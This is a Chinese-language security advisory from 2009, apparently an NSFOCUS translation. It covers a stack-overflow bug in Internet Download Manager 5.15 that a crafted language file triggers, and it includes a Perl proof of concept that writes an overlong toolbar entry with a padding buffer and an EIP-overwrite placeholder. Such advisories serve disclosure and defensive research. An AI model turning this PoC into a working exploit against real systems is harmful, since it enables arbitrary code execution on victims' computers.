安全研究
安全漏洞
Internet下载管理器语言文件解析栈溢出漏洞
发布日期:2009-02-27
更新日期:2009-03-03
受影响系统:Tonec Inc Internet Download Manager 5.15 Build 3
描述:
BUGTRAQ ID:
33934
Internet Download Manager是用于提高下载速度的工具。
如果使用Internet Download Manager下载的语言文件中指定了超长的工具栏名称的话,就可能触发栈溢出,导致执行任意代码。
<*来源:musashi (
musashi@hellcode.net)
链接:
http://securityreason.com/wlb_show/WLB-2009020053
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#####################PoC######################################
#Internet Download Manager v.5.15 Build 3 (4 December)
#Works on Vista
#HellCode Labs || TCC Group ||
http://tcc.hellcode.net
#Bug was found by "musashi" aka karak0rsan
[
musashi@hellcode.net]
#thanx to murderkey
$file="idm_tr.lng";
$lng= "lang=0x1f Türkçe";
$buffer = "\x90" x 1160;
$eip = "AAAA";
$toolbar = "20376=";
$packet=$toolbar.$buffer.$eip;
open(file, '>' . $file);
print file $lng;
print file "\n";
print file $packet;
close(file);
print "File has created!\n";
建议:
厂商补丁:
Tonec Inc
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.internetdownloadmanager.com/浏览次数:2403
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
